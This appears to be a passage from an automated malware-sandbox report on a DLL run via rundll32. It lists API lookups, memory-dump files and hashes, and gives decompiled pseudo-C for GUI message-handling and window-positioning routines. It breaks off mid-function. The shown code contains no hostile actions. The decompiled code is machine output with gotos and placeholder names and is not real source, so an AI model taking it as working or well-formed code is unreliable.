GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04

Strings

EnumDisplayMonitors, xrefs: 10018BDC
USER32, xrefs: 10018B78
MonitorFromRect, xrefs: 10018BBA
GetMonitorInfoA, xrefs: 10018BED
EnumDisplayDevicesA, xrefs: 10018BFE
MonitorFromPoint, xrefs: 10018BCB
GetSystemMetrics, xrefs: 10018B98
MonitorFromWindow, xrefs: 10018BA9

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9

Uniqueness

Uniqueness Score: -1.00%

Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E1002A5D5(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E100199B2(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E10017B95( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E1002A627(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E1002A0D2(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if( *(_t238 + 4) == 0) {
								E100201F1(_t232);
								asm("int3");
								_push(0x28);
								E10030D5A(E10044D1A, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E1001B042(0, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E1001B042(_t229, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E1002A085(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E1002A085(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E1001E706(_t232);
																	} else {
																		_t172 = E1001E6B8(_t232);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E1001E262(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E1002A143(_a4, _v24, _v44);
																			} else {
																				_t174 = E1001B042(_t229, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E1002A17D(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E1001E11F(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E10016D48(_t255, _v36, _t229);
																			} else {
																				_t191 = E1001B042(_t229, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E1002A17D(_t244);
																				E1002A347(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E1002A122(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E1002A4C8(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E1001DE35(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1001DEAF(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E1001DF0C();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E1002A3C2(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E1002A085(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E1002A778(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E100246E1(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E1001B042(_t229, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E1002A2DA(_t232, E1001B042(_t229, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E1002A347(_t229, _t232, _t260, _v24, E1001B042(_t229, _t260, GetFocus()));
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E1002A4F5(_a4, _v24, E1001B042(_t229, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E10030DFF(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E1001E11F(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

0x1002a778
0x1002a779
0x1002a77b
0x1002a77c
0x1002a780
0x1002a781
0x1002a782
0x1002a789
0x1002a78e
0x1002a792
0x1002a794
0x1002a79c
0x1002a7a0
0x1002a7a2
0x1002a7a7
0x1002a7aa
0x1002a7ac
0x1002a7b0
0x1002a7b0
0x1002a7b8
0x1002a7ba
0x1002a7bf
0x00000000
0x00000000
0x1002a7c9
0x1002a7d9
0x00000000
0x00000000
0x1002a7db
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a7c9
0x1002a7dd
0x1002a7dd
0x1002a7aa
0x1002a7a0
0x1002a7df
0x1002a7df
0x1002a7e1
0x1002a7ed
0x1002a7f3
0x00000000
0x00000000
0x1002a7f6
0x1002a7fd
0x1002a7fe
0x1002a810
0x1002a812
0x1002a835
0x1002a835
0x1002a838
0x1002a868
0x1002a86d
0x1002a86e
0x1002a875
0x1002a87a
0x1002a87d
0x1002a87f
0x1002a889
0x1002a881
0x1002a881
0x1002a881
0x1002a88c
0x1002a88f
0x1002a892
0x1002a89c
0x1002a89f
0x1002a8a4
0x1002a8a9
0x1002a8ab
0x1002a8ae
0x1002a8b8
0x1002a8be
0x1002a8c1
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a8b0
0x1002a8b0
0x1002a8b6
0x1002a8c7
0x1002a8c7
0x1002a8c9
0x1002a976
0x1002a978
0x1002a97a
0x1002a97d
0x1002a982
0x1002a985
0x1002a98b
0x1002a98b
0x1002a98d
0x1002a994
0x1002aa1e
0x1002aa23
0x1002aa27
0x1002aa2a
0x1002ab67
0x1002ab6a
0x00000000
0x1002ab70
0x1002ab70
0x1002ab73
0x1002ac23
0x00000000
0x1002ab79
0x1002ab79
0x1002ab7c
0x1002ac2a
0x1002ac2e
0x1002ac33
0x1002ac35
0x00000000
0x1002ac3b
0x1002ac3b
0x1002ac3f
0x1002ac42
0x1002ac44
0x1002ac4d
0x1002ac46
0x1002ac46
0x1002ac46
0x1002ac52
0x1002ac54
0x1002ac56
0x00000000
0x1002ac5c
0x1002ac5c
0x1002ac60
0x1002ac62
0x1002ac66
0x1002ac66
0x1002ac6b
0x1002ac6f
0x1002ac7f
0x1002ac81
0x1002ac83
0x1002ac90
0x1002ac96
0x1002ac85
0x1002ac86
0x1002ac86
0x1002ac9b
0x1002ac9d
0x1002ac9f
0x00000000
0x1002aca5
0x1002acab
0x1002acae
0x1002acb1
0x1002acb6
0x1002acb9
0x1002acc6
0x1002acc6
0x00000000
0x1002acb9
0x1002ac71
0x1002ac71
0x1002ac77
0x00000000
0x1002ac77
0x1002ac6f
0x1002ac56
0x1002ab82
0x1002ab82
0x1002ab85
0x00000000
0x00000000
0x00000000
0x00000000
0x1002ab85
0x1002ab7c
0x1002ab73
0x00000000
0x1002aa30
0x1002aa30
0x1002abbf
0x1002abbf
0x1002abbf
0x00000000
0x1002aa36
0x1002aa36
0x1002aa39
0x00000000
0x1002aa3f
0x1002aa3f
0x1002aa42
0x1002aae1
0x1002aae3
0x00000000
0x1002aae9
0x1002aaeb
0x1002aaf1
0x1002aaf6
0x1002aaf9
0x1002aafc
0x1002ab01
0x1002ab06
0x1002ab08
0x00000000
0x1002ab0e
0x1002ab0e
0x1002ab12
0x1002ab27
0x1002ab29
0x1002ab2b
0x1002ab39
0x1002ab3b
0x1002ab2d
0x1002ab2e
0x1002ab2e
0x1002ab40
0x1002ab42
0x1002ab44
0x1002ab4d
0x1002ab52
0x1002ab5b
0x1002ab61
0x1002ab61
0x1002ab14
0x1002ab14
0x1002ab1a
0x1002ab1c
0x1002ab1c
0x00000000
0x1002ab12
0x1002ab08
0x00000000
0x1002aa48
0x1002aa48
0x1002aa4b
0x1002ab8b
0x1002ab8b
0x1002ab8d
0x00000000
0x1002ab93
0x1002ab96
0x1002ab9b
0x1002ab9d
0x1002ab9e
0x1002abaf
0x1002aba0
0x1002aba0
0x1002aba3
0x1002aba5
0x1002aba5
0x1002abb4
0x1002abb6
0x1002abb8
0x1002abbb
0x1002abd6
0x1002abd6
0x1002abd8
0x1002abdd
0x1002abdf
0x1002abed
0x1002abf0
0x00000000
0x1002abf6
0x1002abf6
0x1002abf7
0x1002abf8
0x1002abf9
0x1002abfb
0x1002ac00
0x1002ac01
0x1002ac04
0x1002ac0c
0x00000000
0x1002ac0c
0x1002abe1
0x1002abe2
0x00000000
0x1002abe2
0x1002abbd
0x1002abc1
0x1002abcc
0x1002abce
0x1002abd0
0x00000000
0x00000000
0x00000000
0x00000000
0x1002abd0
0x1002abbb
0x00000000
0x00000000
0x00000000
0x00000000
0x1002aa4b
0x1002aa42
0x1002aa39
0x1002aa30
0x00000000
0x1002a99a
0x1002a99b
0x1002a99b
0x1002a99c
0x1002a9c8
0x1002a9cc
0x1002a9d1
0x1002a9d8
0x1002a9de
0x1002a9de
0x1002a9e2
0x1002a9e6
0x1002a9ec
0x1002a9ec
0x1002a9f0
0x00000000
0x1002a9f6
0x1002a9f6
0x1002a9fd
0x1002aa02
0x1002aa04
0x00000000
0x1002aa06
0x1002aa06
0x1002aa09
0x1002aa0b
0x00000000
0x1002aa0d
0x1002aa0e
0x1002aa10
0x1002accc
0x1002accc
0x1002accc
0x1002aa0b
0x00000000
0x1002aa04
0x1002a9e8
0x1002a9e8
0x1002a9ea
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a9ea
0x1002a9da
0x1002a9da
0x1002a9dc
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a9dc
0x1002a99e
0x1002a99e
0x1002a9a1
0x1002aa51
0x1002aa51
0x1002aa54
0x1002aa5a
0x1002aa62
0x1002aa68
0x1002aa6a
0x1002aa6d
0x1002aa78
0x1002aa7d
0x1002aa80
0x1002aa8b
0x1002aa90
0x1002aa90
0x1002aa80
0x1002aa6d
0x1002aa91
0x1002aa9a
0x1002aa9c
0x1002aa9e
0x1002aab2
0x1002aabc
0x1002aabe
0x1002aac0
0x1002aad1
0x1002aad1
0x1002aac0
0x1002aad6
0x1002a9a7
0x1002a9a7
0x1002a9aa
0x1002a9bd
0x1002a9bd
0x1002a9c2
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a9ac
0x1002a9ae
0x1002a9b4
0x1002a9b7
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a9b7
0x1002a9aa
0x1002a9a1
0x1002a99c
0x1002a8cf
0x1002a8d5
0x1002a8d7
0x1002a8d7
0x1002a8db
0x00000000
0x00000000
0x1002a8e3
0x1002a8e8
0x1002a8eb
0x1002a8f8
0x1002a8fa
0x1002a8fc
0x00000000
0x00000000
0x1002a8fc
0x00000000
0x1002a8eb
0x1002a8fe
0x1002a900
0x1002a925
0x1002a925
0x1002a92c
0x1002a93c
0x1002a93c
0x1002a93e
0x00000000
0x1002a940
0x1002a940
0x1002a943
0x1002a945
0x00000000
0x1002a947
0x1002a94a
0x1002a94e
0x1002a952
0x1002a95d
0x1002a95d
0x1002a961
0x00000000
0x1002a963
0x1002a963
0x1002a96a
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a96a
0x1002a954
0x1002a954
0x1002a95b
0x1002a96c
0x1002a96c
0x00000000
0x00000000
0x00000000
0x1002a95b
0x1002a952
0x1002a945
0x1002a92e
0x1002a92e
0x1002a931
0x00000000
0x1002a933
0x1002a933
0x1002a93a
0x1002a973
0x1002a973
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a93a
0x1002a931
0x1002a902
0x1002a902
0x1002a905
0x1002a907
0x00000000
0x1002a909
0x1002a909
0x1002a90d
0x00000000
0x1002a90f
0x1002a90f
0x1002a915
0x1002a918
0x1002a91b
0x1002a91d
0x00000000
0x1002a91f
0x1002a91f
0x1002a91f
0x1002a91d
0x1002a90d
0x1002a907
0x1002a900
0x00000000
0x00000000
0x00000000
0x1002a8b6
0x1002aade
0x1002a83a
0x1002a83a
0x1002a83f
0x1002a842
0x1002a847
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a847
0x1002a814
0x1002a814
0x1002a819
0x1002a820
0x1002a81b
0x1002a81b
0x1002a81b
0x1002a824
0x00000000
0x1002a826
0x1002a82f
0x1002a849
0x1002a849
0x1002a84c
0x00000000
0x1002a84e
0x1002a84e
0x1002a851
0x1002a853
0x1002a853
0x1002a856
0x1002a857
0x1002a85d
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a85d
0x1002a831
0x1002a831
0x1002a831
0x1002a861
0x1002a865
0x1002a865
0x1002a82f
0x1002a824
0x1002a800
0x1002a800
0x1002a80a
0x1002a80e
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a80e
0x00000000
0x1002a7fe
0x1002a85f
0x1002a85f
0x00000000

APIs

GetFocus.USER32 ref: 1002A7CB
IsWindowEnabled.USER32(?), ref: 1002A827
__EH_prolog3_catch.LIBCMT ref: 1002A875
GetFocus.USER32 ref: 1002A895
GetParent.USER32(?), ref: 1002A8E0
GetParent.USER32(?), ref: 1002A8F0
GetKeyState.USER32(00000012), ref: 1002A9AE
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1002AA62
GetFocus.USER32 ref: 1002AA75
GetFocus.USER32 ref: 1002AA82
IsWindow.USER32(?), ref: 1002AA9A
GetFocus.USER32 ref: 1002AAA6
IsWindow.USER32(?), ref: 1002AABC
GetFocus.USER32 ref: 1002AAC2
GetKeyState.USER32(00000010), ref: 1002AAEB
MessageBeep.USER32 ref: 1002ABE2

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1001DDC0(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
